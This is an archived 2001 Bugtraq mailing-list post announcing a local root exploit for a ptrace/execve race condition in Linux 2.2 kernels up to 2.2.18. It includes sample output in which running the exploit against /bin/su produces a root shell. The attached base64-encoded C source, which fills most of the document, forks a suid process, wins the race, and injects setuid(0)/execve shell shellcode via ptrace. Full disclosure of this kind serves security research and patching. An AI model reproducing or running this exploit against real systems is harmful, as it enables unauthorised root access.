 | ||||||
| << Previous | INDEX | Search | src | Set bookmark | Go to bookmark | Next >> |
| ||||||
| |||||||||||||||||||||
Date: Tue, 27 Mar 2001 14:05:54 +0200 From: Wojciech Purczynski <wp@ELZABSOFT.PL> To: BUGTRAQ@SECURITYFOCUS.COM Subject: ptrace/execve race condition exploit (non brute-force) This message is in MIME format. The first part should be readable text, while the remaining parts are likely unreadable without MIME-aware tools. Send mail to mime@docserver.cac.washington.edu for more info. ---187401051-1590650075-985694331=:31983 Content-Type: TEXT/PLAIN; CHARSET=ISO-8859-2 Content-Transfer-Encoding: 8BIT Content-ID: <Pine.LNX.4.30.0103271359181.31986@alfa.elzabsoft.pl> Hi, Here is exploit for ptrace/execve race condition bug in Linux kernels up to 2.2.18. It works even on openwall patched kernels (including broken fix in 2.2.18ow4) if you use address of BSS section in memory (use objdump -h /suid/binary to get .bss section address). It does not use brute-force! It does only one attemt, parent process detects exact moment of context-switch after child goes sleep in execve. If you have some problems, ensure that suid binary you want to sploit does not exist in disk cache. For more info read comments in the source code. It has been broken in two places. Sample output: [wp@wp /tmp]$ uname -a Linux wp.local.elzabsoft.pl 2.2.14-5.0 #1 Tue Mar 7 21:07:39 EST 2000 i686 unknown [wp@wp /tmp]$ objdump -h /bin/su | grep .bss 8 .rel.bss 00000030 08048ca8 08048ca8 00000ca8 2**2 21 .bss 000000d4 0804bf04 0804bf04 00002f04 2**2 [wp@wp /tmp]$ find / >dev/null 2>&1 [wp@wp /tmp]$ ./epcs /bin/su 0x0804bf04 Bug exploited successfully. sh-2.03# It works with any suid binary. Cheers, wp +---------------------------------------------------------+ | Wojciech PurczyЯski Linux Administrator | | wp@elzabsoft.pl http://www.elzabsoft.pl/~wp | | +48604432981 http://www.elzabsoft.pl/~wp/gpg.asc | +---------------------------------------------------------+ ---187401051-1590650075-985694331=:31983 Content-Type: TEXT/PLAIN; CHARSET=US-ASCII; NAME="epcs.c" Content-Transfer-Encoding: BASE64 Content-ID: <Pine.LNX.4.30.0103271358510.31983@alfa.elzabsoft.pl> Content-Description: epcs Content-Disposition: ATTACHMENT; FILENAME="epcs.c" LyoNCiAqIGVwY3MgdjINCiAqIH5+fn5+fn4NCiAqIGV4cGxvaXQgZm9yIGV4 ZWN2ZS9wdHJhY2UgcmFjZSBjb25kaXRpb24gaW4gTGludXgga2VybmVsIHVw IHRvIDIuMi4xOA0KICoNCiAqIChjKSAyMDAxIFdvamNpZWNoIFB1cmN6eW5z a2kgLyBjbGlwaCAvIDx3cEBlbHphYnNvZnQucGw+DQogKg0KICogVGhpcyBz cGxvaXQgZG9lcyBfbm90XyB1c2UgYnJ1dGUgZm9yY2UuIEl0IGRvZXMgbm90 IG5lZWQgdGhhdC4NCiAqIEl0IGRvZXMgb25seSBvbmUgYXR0ZW10IHRvIHNw bG9pdCB0aGUgcmFjZSBjb25kaXRpb24gaW4gZXhlY3ZlLiANCiAqIFBhcmVu dCBwcm9jZXNzIHdhaXRzIGZvciBhIGNvbnRleHQtc3dpdGNoIHRoYXQgb2Nj dXIgYWZ0ZXIgDQogKiBjaGlsZCB0YXNrIHNsZWVwIGluIGV4ZWN2ZS4NCiAq DQogKiBJdCBzaG91bGQgd29yayBldmVuIG9uIG9wZW53YWxsLXBhdGNoZWQg a2VybmVscyAoSSBoYXZlbid0IHRlc3RlZCBpdCkuDQogKg0KICogQ29tcGls ZSBpdDoNCiAqCWNjIGVwY3MuYyAtbyBlcGNzDQogKiBVc2FnZToNCiAqCS4v ZXBjcyBbdmljdGltXSBbYWRkcmVzc10NCiAqDQogKiBJdCBnaXZlcyBpbnN0 YW50IHJvb3Qgc2hlbGwgd2l0aCBhbnkgb2YgYSBzdWlkIGJpbmFyaWVzLg0K ICoNCiAqIElmIGl0IGRvZXMgbm90IHdvcmssIHRyeSB1c2Ugc29tZSBtZXRo b2RzIHRvIGVuc3VyZSB0aGF0IGV4ZWN2ZQ0KICogd291bGQgc2xlZXAgd2hp bGUgbG9hZGluZyBiaW5hcnkgZmlsZSBpbnRvIG1lbW9yeSwNCiAqDQogKiAJ aS5lLjogY2F0IC91c3IvbGliLyogPi9kZXYvbnVsbCAyPiYxDQogKg0KICog VGVzdGVkIG9uIFJIIDcuMCBhbmQgUkggNi4yIC8gMi4yLjE0IC8gMi4yLjE4 IC8gMi4yLjE4b3c0DQogKiBUaGlzIGV4cGxvaXQgZG9lcyBub3Qgd29yayBv biAyLjQueCBiZWNhdXNlIGtlcm5lbCB3b24ndCBzZXQgc3VpZCANCiAqIHBy aXZpbGVnZXMgaWYgdXNlciBwdHJhY2VzIGEgYmluYXJ5Lg0KICogQnV0IGl0 IGlzIHN0aWxsIGV4cGxvaXRhYmxlIG9uIHRoZXNlIGtlcm5lbHMuDQogKg0K ICogVGhhbmtzIHRvIEJ1bGJhIChoZSBtYWRlIG1lIHRvIHRha2UgYSBsb29r IGF0IHRoaXMgYnVnIDspICkNCiAqIEdyZWV0aW5ncyB0byBTaWdTZWd2IHRl YW0uDQogKg0KICovDQoNCiNpbmNsdWRlIDxzdGRpby5oPg0KI2luY2x1ZGUg PGZjbnRsLmg+DQojaW5jbHVkZSA8c3lzL3R5cGVzLmg+DQojaW5jbHVkZSA8 c2lnbmFsLmg+DQojaW5jbHVkZSA8bGludXgvdXNlci5oPg0KI2luY2x1ZGUg PHN5cy93YWl0Lmg+DQojaW5jbHVkZSA8bGltaXRzLmg+DQojaW5jbHVkZSA8 ZXJybm8uaD4NCiNpbmNsdWRlIDxzdGRsaWIuaD4NCg0KI2RlZmluZSBDU19T SUdOQUwgU0lHVVNSMQ0KI2RlZmluZSBWSUNUSU0gIi91c3IvYmluL3Bhc3N3 ZCINCiNkZWZpbmUgU0hFTEwgIi9iaW4vc2giDQojZGVmaW5lIFNIRUxMX0xF TiAiXHgwNyIJCS8qIHN0cmxlbihTSEVMTCkgaW4gaGV4ICovDQojZGVmaW5l IFNIRUxMQ09ERSAweDAwMDAwMDAwCQkvKiBhZGRyZXNzIHRvIHB1dCBzaGVs bGNvZGUgYXQgKi8NCg0KLyoNCiAqIFRoaXMgaXMgbXkgcHJpdmF0ZSBzaGVs bGNvZGUuDQogKiBPZmZzZXQgMHgwYSAtIGV4ZWN1dGFibGUncyBmaWxlbmFt ZSBsZW5ndGguDQogKi8NCmNoYXIgc2hlbGxjb2RlWzEwMjRdPQ0KCSJceGVi XHhmZSINCgkiXHgzMVx4YzBceDMxXHhkYlx4YjBceDE3XHhjZFx4ODAiCQkv KiBzZXR1aWQoMCkgKi8NCgkiXHgzMVx4YzBceGIwXHgyZVx4Y2RceDgwIg0K CSJceDMxXHhjMFx4NTBceGViXHgxN1x4OGJceDFjXHgyNCIJCS8qIGV4ZWN2 ZShTSEVMTCkgKi8NCgkiXHg4OFx4NDMiIFNIRUxMX0xFTiAiXHg4OVx4ZTFc eDhkXHg1NFx4MjQiDQoJIlx4MDRceGIwXHgwYlx4Y2RceDgwXHgzMVx4YzBc eDg5Ig0KCSJceGMzXHg0MFx4Y2RceDgwXHhlOFx4ZTRceGZmXHhmZiINCgki XHhmZiIgU0hFTEwgOw0KDQp2b2xhdGlsZSBpbnQgY3NfZGV0ZWN0b3I9MDsN Cg0Kdm9pZCBjc19zaWdfaGFuZGxlcihpbnQgc2lnKQ0Kew0KCWNzX2RldGVj dG9yPTE7DQp9DQoNCnZvaWQgZG9fdmljdGltKGNoYXIgKiBmaWxlbmFtZSkN CnsNCgl3aGlsZSAoIWNzX2RldGVjdG9yKSA7DQoJa2lsbChnZXRwcGlkKCks IENTX1NJR05BTCk7DQoJZXhlY2woZmlsZW5hbWUsIGZpbGVuYW1lLCBOVUxM KTsNCglwZXJyb3IoImV4ZWNsIik7DQoJZXhpdCgtMSk7DQp9DQoNCmludCBj aGVja19leGVjdmUocGlkX3QgdmljdGltLCBjaGFyICogZmlsZW5hbWUpDQp7 DQoJY2hhciBwYXRoW1BBVEhfTUFYKzFdOw0KCWNoYXIgbGlua1tQQVRIX01B WCsxXTsNCglpbnQgcmVzOw0KCQ0KCXNucHJpbnRmKHBhdGgsIHNpemVvZihw YXRoKSwgIi9wcm9jLyVpL2V4ZSIsIChpbnQpdmljdGltKTsNCglpZiAocmVh ZGxpbmsocGF0aCwgbGluaywgc2l6ZW9mKGxpbmspLTEpPDApIHsNCgkJcGVy cm9yKCJyZWFkbGluayIpOw0KCQlyZXR1cm4gLTE7DQoJfQ0KCQ0KCWxpbmtb c2l6ZW9mKGxpbmspLTFdPSdcMCc7DQoJcmVzPSFzdHJjbXAobGluaywgZmls ZW5hbWUpOw0KCWlmIChyZXMpIGZwcmludGYoc3RkZXJyLCAiQ2hpbGQgc2xl cHQgb3V0c2lkZSBvZiBleGVjdmVcbiIpOw0KCXJldHVybiByZXM7DQp9DQoN CmludCBtYWluKGludCBhcmdjLCBjaGFyICogYXJndltdKQ0Kew0KCWNoYXIg KiBmaWxlbmFtZT1WSUNUSU07DQoJcGlkX3QgdmljdGltOw0KCWludCBlcnJv ciwgaTsNCgl1bnNpZ25lZCBsb25nIGVpcD1TSEVMTENPREU7DQoJc3RydWN0 IHVzZXJfcmVnc19zdHJ1Y3QgcmVnczsNCg0KCWlmIChhcmdjPjEpIGZpbGVu YW1lPWFyZ3ZbMV07DQoJaWYgKGFyZ2M+MikgZWlwPXN0cnRvdWwoYXJndlsy XSwgTlVMTCwgMTYpOw0KDQoJc2lnbmFsKENTX1NJR05BTCwgY3Nfc2lnX2hh bmRsZXIpOw0KDQoJdmljdGltPWZvcmsoKTsNCglpZiAodmljdGltPDApIHsN CgkJcGVycm9yKCJmb3JrOiB2aWN0aW0iKTsNCgkJZXhpdCgtMSk7DQoJfQ0K CWlmICh2aWN0aW09PTApIGRvX3ZpY3RpbShmaWxlbmFtZSk7DQoNCglraWxs KHZpY3RpbSwgQ1NfU0lHTkFMKTsNCgl3aGlsZSAoIWNzX2RldGVjdG9yKSA7 DQoJDQoJaWYgKHB0cmFjZShQVFJBQ0VfQVRUQUNILCB2aWN0aW0pKSB7DQoJ CXBlcnJvcigicHRyYWNlOiBQVFJBQ0VfQVRUQUNIIik7DQoJCWdvdG8gZXhp dDsNCgl9DQoJDQoJaWYgKGNoZWNrX2V4ZWN2ZSh2aWN0aW0sIGZpbGVuYW1l KSkNCgkJZ290byBleGl0Ow0KDQoJKHZvaWQpd2FpdHBpZCh2aWN0aW0sIE5V TEwsIFdVTlRSQUNFRCk7DQoJaWYgKHB0cmFjZShQVFJBQ0VfQ09OVCwgdmlj dGltLCAwLCAwKSkgew0KCQlwZXJyb3IoInB0cmFjZTogUFRSQUNFX0NPTlQi KTsNCgkJZ290byBleGl0Ow0KCX0NCg0KCSh2b2lkKXdhaXRwaWQodmljdGlt LCBOVUxMLCBXVU5UUkFDRUQpOw0KCQ0KCWlmIChwdHJhY2UoUFRSQUNFX0dF VFJFR1MsIHZpY3RpbSwgMCwgJnJlZ3MpKSB7DQoJCXBlcnJvcigicHRyYWNl OiBQVFJBQ0VfR0VUUkVHUyIpOw0KCQlnb3RvIGV4aXQ7DQoJfQ0KDQoJcmVn cy5laXA9ZWlwOw0KCQ0KCWZvciAoaT0wOyBpPHN0cmxlbihzaGVsbGNvZGUp OyBpKz00KSB7DQoJCWlmIChwdHJhY2UoUFRSQUNFX1BPS0VEQVRBLCB2aWN0 aW0sIHJlZ3MuZWlwK2ksDQoJCQkJCQkgICAgKihpbnQqKShzaGVsbGNvZGUr aSkpKSB7DQoJCQlwZXJyb3IoInB0cmFjZTogUFRSQUNFX1BPS0VURVhUIik7 DQoJCQlnb3RvIGV4aXQ7DQoJCX0NCgl9DQoNCglpZiAocHRyYWNlKFBUUkFD RV9HRVRSRUdTLCB2aWN0aW0sIDAsICZyZWdzKSkgew0KCQlwZXJyb3IoInB0 cmFjZTogUFRSQUNFX0dFVFJFR1MiKTsNCgkJZ290byBleGl0Ow0KCX0NCg0K CWZwcmludGYoc3RkZXJyLCAiQnVnIGV4cGxvaXRlZCBzdWNjZXNzZnVsbHku XG4iKTsNCgkNCglpZiAocHRyYWNlKFBUUkFDRV9ERVRBQ0gsIHZpY3RpbSwg MCwgMCkpIHsNCgkJcGVycm9yKCJwdHJhY2U6IFBUUkFDRV9DT05UIik7DQoJ CWdvdG8gZXhpdDsNCgl9DQoNCgkodm9pZCl3YWl0cGlkKHZpY3RpbSwgTlVM TCwgMCk7DQoJcmV0dXJuIDA7DQoJDQpleGl0Og0KCWZwcmludGYoc3RkZXJy LCAiRXJyb3IhXG4iKTsNCglraWxsKHZpY3RpbSwgU0lHS0lMTCk7DQoJcmV0 dXJuIC0xOw0KfQ0K ---187401051-1590650075-985694331=:31983--
| |||||||||||||||||||||